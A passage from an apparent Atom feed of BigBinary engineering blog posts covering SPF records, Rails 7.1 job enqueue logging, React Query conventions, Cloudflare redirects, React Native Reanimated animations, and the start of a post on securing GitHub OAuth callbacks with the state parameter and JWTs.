We can also see this result <a href="https://mxtoolbox.com/SuperTool.aspx?action=spf%3abigbinary.com&amp;run=toolpage">online</a>.</p><pre><code>v=spf1 include:_spf.mlsend.com include:_spf.google.com -all</code></pre><p>BigBinary uses Google Workspace, so the second include is for that reason. The first include is to ensure that Mailerlite is in the allowed IP list.</p><p>If we look at the result for &quot;bigbinary.com&quot; by visiting https://dmarcian.com/spf-survey/ then we will see that all these includes are like regular programming language &quot;imports&quot;. They allow the third party to include other third parties in the chain. The end result is that we have a finite list of approved IP addresses which can send email.</p><h2>SPF record standard</h2><p>Let's take a look at NeetoCal's SPF record.</p><pre><code>v=spf1 include:spf.messagingengine.com -all</code></pre><p><code>v=spf1</code> tells the server that this record contains an SPF record. Every SPF record must begin with this string.</p><p><code>include:spf.messagingengine.com</code> tells the server what third-party organizations are authorized to send emails on behalf of the domain. This tag signals that the content of the SPF record for the included domain (messagingengine.com in this case) should be checked and the IP addresses it contains should also be considered authorized. Multiple domains can be included within an SPF record.</p><p><code>-all</code> tells the server that addresses not listed in the SPF record are not authorized to send emails and should be rejected. Alternative options here include <code>~all</code>, which states that emails from unlisted servers will be marked as insecure or spam but still accepted. 
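</p><p>The record format described above can be sketched with a tiny Ruby parser. This is purely illustrative; real SPF evaluation, as specified in RFC 7208, resolves <code>include:</code> mechanisms via DNS and matches the connecting server's IP against the collected addresses:</p><pre><code class="language-rb"># Split an SPF record string into its version, include: mechanisms
# and the final 'all' qualifier. Illustration only; not a full parser.
def parse_spf(record)
  version, *terms = record.split(' ')
  qualifier = terms.pop  # e.g. '-all', '~all' or '+all'
  includes = terms.select { |t| t.start_with?('include:') }
                  .map { |t| t.sub('include:', '') }
  { version: version, includes: includes, all_qualifier: qualifier }
end

parse_spf('v=spf1 include:_spf.mlsend.com include:_spf.google.com -all')
# returns { version: 'v=spf1',
#           includes: ['_spf.mlsend.com', '_spf.google.com'],
#           all_qualifier: '-all' }</code></pre><p>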
<code>+all</code> signifies that any server can send emails on behalf of the domain.</p><p>Here is another format of an SPF record.</p><pre><code>v=spf1 ip4:192.0.2.0 ip4:192.0.2.1 include:messagingengine.email -all</code></pre><p>In this example, the SPF record is telling the server that 192.0.2.0 and 192.0.2.1 are also authorized to send emails on behalf of the domain.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.1 adds support for logging background job enqueue callers]]></title>
       <author><name>Vishnu M</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-1-adds-support-for-logging-background-job-enqueue-callers"/>
      <updated>2023-04-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-1-adds-support-for-logging-background-job-enqueue-callers</id>
      <content type="html"><![CDATA[<p>Rails 7.1 has introduced a new option in Active Job that allows us to addsupport for logging background job enqueue callers. It provides informationabout the location from where a job was enqueued, which can be immensely helpfulduring debugging. The following is an example of what the log output looks like:</p><pre><code class="language-ruby">[ActiveJob] Enqueued NotifySubscribersJob (Job ID: 5945980f-303e-4c3f-af5b-e22be170f7c5) to Sidekiq(default)[ActiveJob]  app/models/post.rb:14 in `notify_subscribers`</code></pre><p>By examining the logs above, we can determine that the <code>NotifySubscribersJob</code>was enqueued from the <code>notify_subscribers</code> method in the <code>Post</code> model, providingus with a clear picture of the job's origin.</p><p>To enable this functionality, we need to set the following configuration in<code>config/environments/development.rb</code>.</p><pre><code class="language-rb">config.active_job.verbose_enqueue_logs = true</code></pre><p>However, Rails 7.1 ships with this configuration set by default.</p><p>It's important to note that using verbose enqueue logs in a production environmentis not recommended, as it uses the<a href="https://apidock.com/ruby/Kernel/caller">Kernel#caller</a> method to retrieve theexecution stack, which can be slow.</p><p>Please check out this <a href="https://github.com/rails/rails/pull/47839">pull request</a>for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[React Query to simplify data fetching in Neeto]]></title>
       <author><name>Mohit Harshan</name></author>
      <link href="https://www.bigbinary.com/blog/react-query"/>
      <updated>2023-04-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/react-query</id>
      <content type="html"><![CDATA[<h2>Introduction</h2><p><a href="https://tanstack.com/query/v3/docs/react/overview">React Query</a> is a powerfultool that simplifies the data fetching, caching and synchronization with theserver by providing a declarative and composable API of hooks. It was created byTanner Linsley in 2020 and has gained a lot of popularity since then.</p><p>It uses a cache-first approach to optimize the user experience by reducing thenumber of network requests made by the application. React Query also providesbuilt-in support for features like pagination, optimistic updates, and retryingfailed requests.</p><p>While building <a href="https://neeto.com">neeto</a> we started using React Query and welearned a few things about how to effectively use it. Below are some of thelessons we learned.</p><h2>Major advantages of using React Query</h2><ol><li><p><strong>Simplifies data fetching - It erases a lot of boilerplate and makes ourcode easier to read.</strong></p><p>Here is a comparison of code structure with and without using <code>react-query</code>to fetch data from the server:</p><p>Without React Query:</p><pre><code class="language-js">const [isLoading, setIsLoading] = useState(false);const [data, setData] = useState([]);const [error, setError] = useState(null);useEffect(() =&gt; {  setIsLoading(true);  (async () =&gt; {    try {      const data = await fetchPosts();      setData(data);    } catch (error) {      setError(error);    } finally {      setIsLoading(false);    }  })();}, []);</code></pre><p>With React Query:</p><pre><code class="language-js">const { isInitialLoading, data, error } = useQuery([&quot;posts&quot;], fetchPosts);</code></pre><p>React Query provides a <code>useQuery</code> hook to fetch data from the server. Theentire <code>useEffect</code> was replaced with a single line with React Query. 
The <code>isInitialLoading</code>, <code>error</code> and <code>data</code> states are handled out of the box.</p></li><li><p><strong>Provides tools to improve user experience and prevent unnecessary API calls.</strong></p><p>React Query provides a powerful caching mechanism that can help prevent unnecessary API calls by storing the results of API requests in a cache. When a component requests data from the API using React Query, it first checks if the data is already present in the cache. If the data is present and hasn't expired, React Query returns the cached data instead of making a new API call.</p><p>Here's an example:</p><p>Suppose we have a component that displays a list of todos fetched from an API endpoint at <code>https://api.example.com/todos</code>. We can use React Query to fetch the data and store it in the cache like this:</p><pre><code class="language-js">import { useQuery } from &quot;@tanstack/react-query&quot;;

const TodoList = () =&gt; {
  const { data, isInitialLoading, isError } = useQuery(
    [&quot;todos&quot;],
    () =&gt; axios.get(&quot;https://api.example.com/todos&quot;).then(({ data }) =&gt; data),
    {
      staleTime: 10000, // data considered &quot;fresh&quot; for 10 seconds
    }
  );

  if (isInitialLoading) {
    return &lt;div&gt;Loading...&lt;/div&gt;;
  }

  if (isError) {
    return &lt;div&gt;Error fetching data&lt;/div&gt;;
  }

  return (
    &lt;ul&gt;
      {data.map(todo =&gt; (
        &lt;li key={todo.id}&gt;{todo.title}&lt;/li&gt;
      ))}
    &lt;/ul&gt;
  );
};

export default TodoList;</code></pre><p>In this example, <code>useQuery</code> is used to fetch the data from the API endpoint. The first argument to useQuery is a unique key that identifies the query, and the second argument is a function that returns the data by making a request to the API endpoint.</p><p>Now, suppose the user navigates away from the <code>TodoList</code> component and then comes back to it. If the data in the cache hasn't expired, React Query will return the cached data instead of making a new API call, which 
can help prevent unnecessary network requests.</p><p>If the stale time has expired, React Query will not show the loading state because it will automatically trigger a new API call to fetch the data in the background. During this time, React Query will return the stale data from the cache while it waits for the new data to arrive. This means that our component will continue to display the old data until the new data arrives, but it won't show a loading state because it's not waiting for the data to load.</p><p>Once the new data arrives, React Query will update the cache with the new data and then return the updated data to the component.</p></li><li><p><strong>Request Retries - Ability to retry a request in case of errors.</strong></p><p>React Query provides built-in support for request retries when API requests fail. This can be useful in situations where network connectivity is unreliable, or when the server is under heavy load and returns intermittent errors.</p><p>When we use useQuery or useMutation from React Query, we can provide an optional retry option that specifies the number of times to retry a failed request. Here's an example:</p><pre><code class="language-js">const { data, isInitialLoading, isError } = useQuery(
  [&quot;todos&quot;],
  () =&gt; axios.get(&quot;https://api.example.com/todos&quot;),
  {
    retry: 4, // retry up to 4 times
  }
);</code></pre><p>In this example, we're using <code>useQuery</code> to fetch data from an API endpoint. We've set the retry option to 4, which means that React Query will retry the API request up to 4 times if it fails. If the API request still fails after 4 retries, React Query will return an error to our component.</p><p>We can also customize the behavior of request retries by providing a function to the <code>retryDelay</code> option. This function should take the current retry count as an argument and return the number of milliseconds to wait before retrying the request. 
Here's an example:</p><pre><code class="language-js">const { data, isInitialLoading, isError } = useQuery(
  [&quot;todos&quot;],
  () =&gt; axios.get(&quot;https://api.example.com/todos&quot;).then(({ data }) =&gt; data),
  {
    retry: 3, // retry up to 3 times
    retryDelay: retryCount =&gt; Math.min(retryCount * 1000, 30000), // back off by 1 second per attempt, capped at 30 seconds
  }
);</code></pre></li><li><p><strong>Window Focus Refetching - Refetching based on application tab activity.</strong></p><p>Window Focus Refetching is a feature of React Query that allows us to automatically refetch our data when the user returns to our application's tab in their browser. This can be useful if we have data that changes frequently or if we want to ensure that our data is always up to date.</p><p>Please note that <code>refetchOnWindowFocus</code> is true by default.</p><p>To disable it, we can do it per query or globally in the query client.</p><p>Disabling per-query:</p><pre><code class="language-js">useQuery([&quot;todos&quot;], fetchTodos, { refetchOnWindowFocus: false });</code></pre><p>Disabling globally:</p><pre><code class="language-js">const queryClient = new QueryClient({
  defaultOptions: {
    queries: {
      refetchOnWindowFocus: false, // default: true
    },
  },
});</code></pre></li></ol><h2>How to integrate React Query</h2><ol><li><p>We can install React Query using <code>npm</code> or <code>yarn</code>. Open the terminal and navigate to the project directory. 
Then, run one of the following commands:</p><p>Using npm:</p><pre><code>npm install @tanstack/react-query</code></pre><p>Using yarn:</p><pre><code>yarn add @tanstack/react-query</code></pre></li><li><p>To integrate React Query, first we need to wrap the app in a <code>QueryClientProvider</code>. In the <code>App.jsx</code> file (or whichever is the topmost parent):</p><pre><code class="language-js">import queryClient from &quot;utils/queryClient&quot;;
import { ReactQueryDevtools } from &quot;@tanstack/react-query-devtools&quot;;
import { QueryClientProvider } from &quot;@tanstack/react-query&quot;;

const App = () =&gt; (
  &lt;QueryClientProvider client={queryClient}&gt;
    &lt;Main /&gt;
    &lt;ReactQueryDevtools initialIsOpen={false} /&gt;
  &lt;/QueryClientProvider&gt;
);

export default App;</code></pre><p><code>ReactQueryDevtools</code> is a great tool for debugging and optimizing our React Query cache. With <code>ReactQueryDevtools</code>, we can view the current state of our queries, including the query status, data, and any errors that may have occurred. We can also view the cache entries and manually trigger queries or invalidate cache entries.</p><pre><code class="language-js">import { QueryClient } from &quot;@tanstack/react-query&quot;;

const queryClient = new QueryClient({
  defaultOptions: {
    queries: {
      staleTime: 100_000,
    },
  },
});

export default queryClient;</code></pre><p>The <code>queryClient</code> holds the query cache. The query client provider is a React context provider, which allows us to access the client (and thus the cache) without passing it as a prop explicitly. Every time we call <code>useQueryClient()</code>, we get access to this client. 
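</p><p>The <code>staleTime</code> option configured above can be illustrated with a simplified, hypothetical sketch. This is not React Query's actual implementation; it only shows the idea of serving cached data while it is fresh and refetching once it has gone stale:</p><pre><code class="language-js">// Hypothetical sketch of a stale-time check: serve cached data while
// it is fresh, otherwise run the fetcher and update the cache.
const createCache = staleTime =&gt; {
  const entries = new Map();

  return {
    async fetch(key, fetcher, now = Date.now()) {
      const entry = entries.get(key);
      if (entry &amp;&amp; now - entry.updatedAt &lt; staleTime) {
        return entry.data; // fresh: no network request is made
      }
      const data = await fetcher();
      entries.set(key, { data, updatedAt: now });
      return data;
    },
  };
};</code></pre><p>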
The <code>useQuery</code> &amp; <code>useMutation</code> hooks use the query client internally.</p><p><code>staleTime</code> is the duration until a query transitions from fresh to stale. As long as the query is fresh, data will always be read from the cache only. <code>cacheTime</code> is the duration until inactive queries are removed from the cache. It defaults to 5 minutes.</p><p>Most of the time, if we want to change one of these settings, it's the <code>staleTime</code> that needs adjusting. We have rarely ever needed to tamper with the <code>cacheTime</code>.</p></li><li><p>React Query provides two main hooks to fetch and mutate data: <code>useQuery</code> and <code>useMutation</code>.</p><p><code>useQuery</code>:</p><pre><code class="language-js">const { data, isInitialLoading, isError } = useQuery([&quot;todos&quot;], () =&gt;
  axios.get(&quot;https://api.example.com/todos&quot;)
);</code></pre><p>In this example, we're using useQuery to fetch data from an API endpoint at <code>https://api.example.com/todos</code>. The first argument to <code>useQuery</code> is a unique key that identifies this query. The second argument is a function that returns a promise that resolves to the data we want to fetch.</p><p>The <code>useQuery</code> hook returns an object with three properties: <code>data</code>, <code>isInitialLoading</code>, and <code>isError</code>. In addition to these, <code>useQuery</code> also returns various other properties like <code>isSuccess</code> and <code>isFetching</code>, and callbacks like <code>onError</code>, <code>onSettled</code> and <code>onSuccess</code>. 
The <code>data</code> property contains the data that was fetched, while <code>isInitialLoading</code> and <code>isError</code> are booleans that indicate whether the data is currently being fetched or if an error occurred while fetching it.</p><p><code>useMutation</code>:</p><pre><code class="language-js">import { useQueryClient, useMutation } from &quot;@tanstack/react-query&quot;;

const queryClient = useQueryClient();

const { mutate, isLoading } = useMutation(
  data =&gt; axios.post(&quot;https://api.example.com/todos&quot;, data),
  {
    onSuccess: () =&gt; {
      queryClient.invalidateQueries(&quot;todos&quot;);
    },
  }
);</code></pre><p>In this example, we're using <code>useMutation</code> to send data to an API endpoint at <code>https://api.example.com/todos</code> using a <code>POST</code> request. The first argument to <code>useMutation</code> is a function that takes the data we want to send and returns a promise that resolves to the response from the API.</p><p>The second argument to <code>useMutation</code> is an options object that allows us to specify a callback <code>onSuccess</code> function to be called when the mutation succeeds. In addition to <code>onSuccess</code>, <code>useMutation</code> provides various other callbacks such as <code>onError</code>, <code>onMutate</code> and <code>onSettled</code>. In this case, we're using the <code>onSuccess</code> option to invalidate the <code>todos</code> query in the <code>queryClient</code>. 
This will cause the query to be refetched the next time it's requested, so the updated data will be displayed.</p></li></ol><h2>The standards we follow at BigBinary</h2><ol><li><p>The <code>QueryClientProvider</code> is wrapped in the <code>App.jsx</code> file.</p></li><li><p>The <code>queryClient</code> is placed in the <code>utils/queryClient.js</code> file and it can set the default values for stale time, cache time etc.</p></li><li><p>We store the query keys in the <code>constants/query.js</code> file.</p><pre><code class="language-js">export const DEFAULT_STALE_TIME = 3_600_000;

export const QUERY_KEYS = {
  WEB_PUSH_NOTIFICATIONS: &quot;web-push-notifications&quot;,
  WIDGET_SETTINGS: &quot;widget-settings&quot;,
  WIDGET_INSTALLATION_SCRIPT: &quot;widget-installation-script&quot;,
};</code></pre></li><li><p>To fetch and mutate data, we create API hooks in the <code>hooks/reactQuery</code> folder and, based on the structure of the app, we create folders or files inside this folder. For example, we can have a <code>hooks/reactQuery/settings</code> folder to separate settings-related hooks from other API hooks.</p></li><li><p>React Query hook files are named in the format <code>use*Api</code> where <code>*</code> is the specific set of APIs we are trying to use.</p><p>For example, inside <code>hooks/reactQuery/useIntegrationsApi.js</code>:</p><pre><code class="language-js">import { prop } from &quot;ramda&quot;;
import { useMutation, useQuery } from &quot;react-query&quot;;

import { DEFAULT_STALE_TIME, QUERY_KEYS } from &quot;src/constants/query&quot;;
import integrationsApi from &quot;apis/integrations&quot;;
import queryClient from &quot;utils/queryClient&quot;;

const { THIRD_PARTY_APPS } = QUERY_KEYS;

const onMutation = () =&gt; queryClient.invalidateQueries(THIRD_PARTY_APPS);

export const useUpdateIntegration = () =&gt;
  useMutation(({ id, options }) =&gt; integrationsApi.update(id, options), {
    onSuccess: onMutation,
  });

export const useFetchIntegrations = () =&gt;
  useQuery(THIRD_PARTY_APPS, integrationsApi.fetchThirdPartyApps, {
    staleTime: DEFAULT_STALE_TIME,
    select: prop(&quot;thirdPartyApps&quot;),
  });</code></pre></li><li><p>We import the API hooks from the <code>use*Api</code> file we have created and use them in the file where we would like to fetch or mutate data.</p><p>For example:</p><pre><code class="language-js">import {
  useFetchIntegrations,
  useUpdateIntegration,
} from &quot;hooks/reactQuery/useIntegrationsApi&quot;;

const Integrations = () =&gt; {
  const { data: integrationApps, isLoading } = useFetchIntegrations();
  const { mutate: updateIntegration, isLoading: isInstalling } =
    useUpdateIntegration();

  return (
    &lt;div&gt;
      &lt;DataTable data={integrationApps} /&gt;
    &lt;/div&gt;
  );
};

export default Integrations;</code></pre></li></ol><p>At BigBinary, we are using React Query v3. Since the update from v3 to v4, there have been some breaking changes. For more information, refer to the <a href="https://tanstack.com/query/v4/docs/react/guides/migrating-to-react-query-4#react-query-is-now-tanstackreact-query">documentation</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Redirecting URL using cloudflare redirect rules]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/redirecting-url-using-cloudflare"/>
      <updated>2023-03-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/redirecting-url-using-cloudflare</id>
      <content type="html"><![CDATA[<p>At BigBinary, we had been using AceInvoice as our time tracking and invoicingtool for years. Last year, we migrated all the data to<a href="https://neeto.com/neetoinvoice">NeetoInvoice</a>.</p><p>All this time, the AceInvoice website was not redirecting to NeetoInvoice. Todaywe did that using <a href="https://cloudflare.com">Cloudflare</a>. The URL forwarding orredirecting with<a href="https://developers.cloudflare.com/support/page-rules/configuring-url-forwarding-or-redirects-with-page-rules/">page rule</a>is a neat feature of Cloudflare. Below are the screenshots of the steps taken toredirect the URLs. More details are covered in the video.</p><h3>Handling www version</h3><p><img src="/blog_images/2023/redirecting-url-using-cloudflare/www-version.png" alt="WWW version"></p><h3>Handling no www version</h3><p><img src="/blog_images/2023/redirecting-url-using-cloudflare/no-www-version.png" alt="No WWW version"></p><p>&lt;iframewidth=&quot;560&quot;height=&quot;315&quot;src=&quot;https://www.youtube.com/embed/R6-qnYN6PUs&quot;title=&quot;YouTube video player&quot;frameborder=&quot;0&quot;allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot;allowfullscreen</p><blockquote><p>&lt;/iframe&gt;</p></blockquote><p>We didn't mention it in the video, but it's worth knowing that we need to have a<code>CNAME</code> record for a subdomain that needs forwarding. For examples let's saythat we need to forward all traffic from <code>https://videos.bigbinary.com</code> to<code>https://bigbinary.com/video</code>. We can't add a page rule for this directly. Forwe need to add a DNS entry for subdomain <code>videos</code> and this entry must havecloudflare &quot;proxy&quot; checked so that you see <code>Proxied</code> next to it. If you see &quot;DNSonly&quot; then that means Cloudflare will not be able to do any forwarding.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Running React Native dependent animations on UI thread using Reanimated]]></title>
       <author><name>Sangamesh Somawar</name></author>
      <link href="https://www.bigbinary.com/blog/running-react-native-dependent-animations-on-ui-thread-using-reanimated"/>
      <updated>2023-03-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/running-react-native-dependent-animations-on-ui-thread-using-reanimated</id>
      <content type="html"><![CDATA[<p><img src="https://user-images.githubusercontent.com/93119254/222339128-047c3afe-543f-48a0-9420-a8c6969a156c.gif" alt="Slider"></p><p>Here we have a slider. When the user slides the slider, the loader needs to showhow much is loaded. We want to animate the loader component when the slidermoves. In other words, the loader animation is &quot;dependent&quot; on the slideranimation.</p><p>This is an example of <em>Dependent Animations</em> on the UI thread. <em>DependentAnimation</em> is when one view is animated based on another element.</p><p>first we need a gesture handler to detect the slider events. Then, based on theslider events we need to animate the progress ofthe  loader component.</p><h3>Building gesture handler to detect the slider events</h3><pre><code class="language-jsx">const [width, setWidth] = useState(200);const x = useSharedValue(0);const gestureHandler = useAnimatedGestureHandler({  onStart: (event, ctx) =&gt; {    x.value = event.absoluteX;  },  onActive: (event, ctx) =&gt; {    x.value = event.absoluteX;    // We need to calculate `progress` here based on the slider position.  
  },
});

const animatedStyle = useAnimatedStyle(() =&gt; {
  return {
    transform: [
      {
        translateX: x.value,
      },
    ],
  };
});

return (
  &lt;PanGestureHandler onGestureEvent={gestureHandler}&gt;
    &lt;Animated.View style={[{ height: 20 }]}&gt;
      &lt;Animated.View
        pointerEvents=&quot;none&quot;
        style={[
          {
            backgroundColor: &quot;blue&quot;,
            height: 20,
            width: 20,
            borderRadius: 10,
          },
          animatedStyle,
        ]}
      /&gt;
      &lt;View
        pointerEvents=&quot;none&quot;
        style={{
          backgroundColor: &quot;black&quot;,
          height: 2,
          width: &quot;100%&quot;,
          position: &quot;absolute&quot;,
          top: 10,
        }}
      /&gt;
    &lt;/Animated.View&gt;
  &lt;/PanGestureHandler&gt;
);</code></pre><p><strong>Loader component:</strong></p><pre><code class="language-jsx">&lt;View style={{ height: 20, marginTop: 10 }}&gt;
  &lt;Lottie
    style={{
      alignSelf: &quot;center&quot;,
      width: &quot;100%&quot;,
    }}
    progress={&quot;Calculated `progress` based on slider position.&quot;}
    source={require(&quot;./progress&quot;)}
    autoPlay={false}
    loop={false}
  /&gt;
&lt;/View&gt;</code></pre><h3>Animate the loader based on the slider position</h3><p>Before we move further, let's understand the difference between the UI Thread and the JS Thread. The UI Thread handles rendering and gestures of Android and iOS views, whereas the JS Thread takes care of all the logic of the React Native application.</p><p>&lt;video width=&quot;320&quot; height=&quot;240&quot; controls muted&gt;&lt;source src=&quot;https://user-images.githubusercontent.com/93119254/199667917-fa5e172e-6b42-481a-abb4-34040179cef7.mov&quot;&gt;&lt;/video&gt;</p><p>We have two approaches for animating the loader.</p><p>In the first approach, when the slider moves, we can store the <code>progress</code> in React state and pass it to the <a href="https://lottiefiles.com/">Lottie animation</a>. 
With this approach, the entire component rerenders on setting the <code>progress</code>.</p><pre><code class="language-jsx">const [progress, setProgress] = useState(0);

const gestureHandler = useAnimatedGestureHandler({
  onStart: (event, ctx) =&gt; {
    x.value = event.absoluteX;
  },
  onActive: (event, ctx) =&gt; {
    x.value = event.absoluteX;
    runOnJS(setProgress)(x.value / width);
  },
});

&lt;Lottie
  style={{
    alignSelf: &quot;center&quot;,
    width: &quot;100%&quot;,
  }}
  progress={progress}
  source={require(&quot;./progress&quot;)}
  autoPlay={false}
  loop={false}
/&gt;;</code></pre><p>In the second approach, when the slider moves, we can calculate <code>progress</code> and pass it to the loader component via <a href="https://docs.swmansion.com/react-native-reanimated/docs/api/hooks/useAnimatedProps/"><code>useAnimatedProps</code></a>. In this way, the <code>progress</code> gets calculated on the UI thread itself. Hence it avoids rerenders.</p><pre><code class="language-jsx">const LottieAnimated = Animated.createAnimatedComponent(Lottie);

const lottieAnimatedProps = useAnimatedProps(() =&gt; ({ progress: x.value / width }));

const gestureHandler = useAnimatedGestureHandler({
  onStart: (event, ctx) =&gt; {
    x.value = event.absoluteX;
  },
  onActive: (event, ctx) =&gt; {
    x.value = event.absoluteX;
  },
});

&lt;LottieAnimated
  style={{
    alignSelf: &quot;center&quot;,
    width: &quot;100%&quot;,
  }}
  animatedProps={lottieAnimatedProps}
  source={require(&quot;./progress&quot;)}
  autoPlay={false}
  loop={false}
/&gt;;</code></pre><h3>Conclusion</h3><p>With the first approach, whenever the slider moves, the UI thread will pass the gesture event to the JS thread to store the <code>progress</code> value in React state, and when the <code>progress</code> value changes in the JS thread, it causes a re-render. 
This approach creates a lot of traffic over the <a href="https://reactnative.dev/architecture/threading-model">Communication Bridge</a> because of the message exchange between UI and JS threads.</p><p>So we should prefer the second approach to run any calculations on the UI thread instead of the JS thread. Here is the entire code for reference:</p><pre><code class="language-jsx">let approach1ReRenderCount = 0;

const Approach1: () =&gt; Node = () =&gt; {
  const [width, setWidth] = useState(1);
  const x = useSharedValue(0);
  const [progress, setProgress] = useState(0);

  const gestureHandler = useAnimatedGestureHandler({
    onStart: (event, ctx) =&gt; {
      x.value = event.absoluteX;
    },
    onActive: (event, ctx) =&gt; {
      x.value = event.absoluteX;
      runOnJS(setProgress)(x.value / width);
    },
  });

  const animatedStyle = useAnimatedStyle(() =&gt; {
    return {
      transform: [
        {
          translateX: x.value,
        },
      ],
    };
  });

  return (
    &lt;SafeAreaView&gt;
      &lt;View
        style={{
          height: 150,
          paddingHorizontal: 20,
          borderWidth: 1,
          margin: 10,
          justifyContent: &quot;center&quot;,
        }}
        onLayout={({
          nativeEvent: {
            layout: { width },
          },
        }) =&gt; {
          setWidth(width);
        }}
      &gt;
        &lt;Text style={{ fontSize: 20, paddingBottom: 10 }}&gt;Approach 1&lt;/Text&gt;
        &lt;Text style={{ fontSize: 20 }}&gt;
          Rerender Count : {approach1ReRenderCount++}
        &lt;/Text&gt;
        &lt;View style={{ height: 20, marginTop: 10 }}&gt;
          &lt;LottieAnimated
            style={{
              alignSelf: &quot;center&quot;,
              width: &quot;100%&quot;,
            }}
            progress={progress}
            source={require(&quot;./progress&quot;)}
            autoPlay={false}
            loop={false}
          /&gt;
        &lt;/View&gt;
        &lt;PanGestureHandler onGestureEvent={gestureHandler}&gt;
          &lt;Animated.View
            style={[{ height: 20 }]}&gt;
            &lt;Animated.View
              style={[
                {
                  backgroundColor: &quot;blue&quot;,
                  height: 20,
                  width: 20,
                  borderRadius: 10,
                },
                animatedStyle,
              ]}
            /&gt;
            &lt;View
              style={{
                backgroundColor: &quot;black&quot;,
                height: 2,
                width: &quot;100%&quot;,
                position: &quot;absolute&quot;,
                top: 10,
              }}
            /&gt;
          &lt;/Animated.View&gt;
        &lt;/PanGestureHandler&gt;
      &lt;/View&gt;
    &lt;/SafeAreaView&gt;
  );
};

const LottieAnimated = Animated.createAnimatedComponent(Lottie);

let approach2ReRenderCount = 0;

const Approach2: () =&gt; Node = () =&gt; {
  const [width, setWidth] = useState(1);
  const x = useSharedValue(0);

  const lottieAnimatedProps = useAnimatedProps(() =&gt; ({ progress: x.value / width }));

  const gestureHandler = useAnimatedGestureHandler({
    onStart: (event, ctx) =&gt; {
      x.value = event.absoluteX;
    },
    onActive: (event, ctx) =&gt; {
      x.value = event.absoluteX;
    },
  });

  const animatedStyle = useAnimatedStyle(() =&gt; {
    return {
      transform: [
        {
          translateX: x.value,
        },
      ],
    };
  });

  return (
    &lt;SafeAreaView&gt;
      &lt;View
        style={{
          height: 150,
          paddingHorizontal: 20,
          borderWidth: 1,
          margin: 10,
          justifyContent: &quot;center&quot;,
        }}
        onLayout={({
          nativeEvent: {
            layout: { width },
          },
        }) =&gt; {
          setWidth(width);
        }}
      &gt;
        &lt;Text style={{ fontSize: 20, paddingBottom: 10 }}&gt;Approach 2&lt;/Text&gt;
        &lt;Text style={{ fontSize: 20 }}&gt;
          Rerender Count : {approach2ReRenderCount++}
        &lt;/Text&gt;
        &lt;View style={{ height: 20, marginTop: 10 }}&gt;
          &lt;LottieAnimated
            animatedProps={lottieAnimatedProps}
            style={{
              alignSelf: &quot;center&quot;,
              width: &quot;100%&quot;,
            }}
            source={require(&quot;./progress&quot;)}
            autoPlay={false}
            loop={false}
          /&gt;
        &lt;/View&gt;
        &lt;PanGestureHandler onGestureEvent={gestureHandler}&gt;
          &lt;Animated.View style={[{ height: 20 }]}&gt;
            &lt;Animated.View
              pointerEvents=&quot;none&quot;
              style={[
                {
                  backgroundColor: &quot;blue&quot;,
                  height: 20,
                  width: 20,
                  borderRadius: 10,
                },
                animatedStyle,
              ]}
            /&gt;
            &lt;View
              pointerEvents=&quot;none&quot;
              style={{
                backgroundColor: &quot;black&quot;,
                height: 2,
                width: &quot;100%&quot;,
                position: &quot;absolute&quot;,
                top: 10,
              }}
            /&gt;
          &lt;/Animated.View&gt;
        &lt;/PanGestureHandler&gt;
      &lt;/View&gt;
    &lt;/SafeAreaView&gt;
  );
};</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[How to use JWT to secure your GitHub OAuth callback endpoint]]></title>
       <author><name>Jagannath Bhat</name></author>
      <link href="https://www.bigbinary.com/blog/how-to-use-jwt-to-secure-your-github-oauth-callback-endpoint"/>
      <updated>2023-03-07T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-to-use-jwt-to-secure-your-github-oauth-callback-endpoint</id>
      <content type="html"><![CDATA[<p>JSON Web Tokens (JWTs) have become a popular way to manage user authenticationand authorization. In this blog, we will explore how to use JWTs in GitHub OAuthprocess, including how to encode additional parameters in the JWT to improve thesecurity and functionality of your GitHub OAuth integration. Let's start bylooking into what OAuth is.</p><h2>OAuth 2.0</h2><p>OAuth 2.0 is an authorization framework that enables an application to accessdata from a server on behalf of a user. For example, OAuth enables applicationsto access data from Google, Facebook, GitHub, etc., on behalf of users havingaccounts in that service.</p><p>Let's say you have an application that requires access to a user's data onGitHub. The following are the steps involved in authorizing your applicationwith GitHub:</p><ol><li><p>The application requests authorization from GitHub. The following are some ofthe parameters this request should contain:</p><ul><li><code>client_id</code> - This is an ID used by GitHub for identifying the application.You need to register your application with GitHub to get this ID.</li><li><code>redirect_uri</code> - The URI to which GitHub should send back a request oncethe authorization is approved.</li><li><code>login</code> - This is a username on GitHub. The application requires access todata on behalf of the user with this username.</li><li><code>state</code> - This should ideally be a string of random characters. Store thisstring in memory because it will be used in another step. This parameter isoptional but highly recommended. We'll look into why later.</li></ul></li><li><p>GitHub then asks the user to grant the authorization. The user might beprompted to log in to GitHub if they have not already logged in. Then GitHubdisplays information on the application and lists all the data theapplication wants to access. If the user denies authorization, the processends here. 
If the user approves, we move on to the next step.</p></li><li><p>GitHub sends a request to the application through the URI passed as <code>redirect_uri</code> in the first step. This request will contain a <code>code</code> parameter that serves as a temporary authorization code and a <code>state</code> parameter.</p></li><li><p>The OAuth process must be dropped immediately if the value of the <code>state</code> parameter from the previous step does not match the random string stored in memory in step 1. This ensures that the OAuth process was initiated by your application. We'll look more into this later.</p></li><li><p>The application should send another request to GitHub to generate a permanent authentication token. This request should contain the <code>code</code> sent by GitHub in step 3.</p></li><li><p>GitHub responds with an authentication token that can be used by the application to access data on behalf of the user.</p></li></ol><p><img src="/blog_images/2023/how-to-use-jwt-to-secure-your-github-oauth-callback-endpoint/github_oauth_process.png" alt="GitHub OAuth process"></p><h2>The state parameter</h2><p>The <code>state</code> parameter plays a crucial role in ensuring that the GitHub OAuth process was initiated by your application or a trusted source. An unauthorized third party could pose as your application by using your <code>client_id</code>. The value of <code>client_id</code> is not exactly a secret. GitHub treats any OAuth process initiated using your ID as an OAuth process started by your application.</p><p>Let's see how the OAuth process would play out when initiated by an 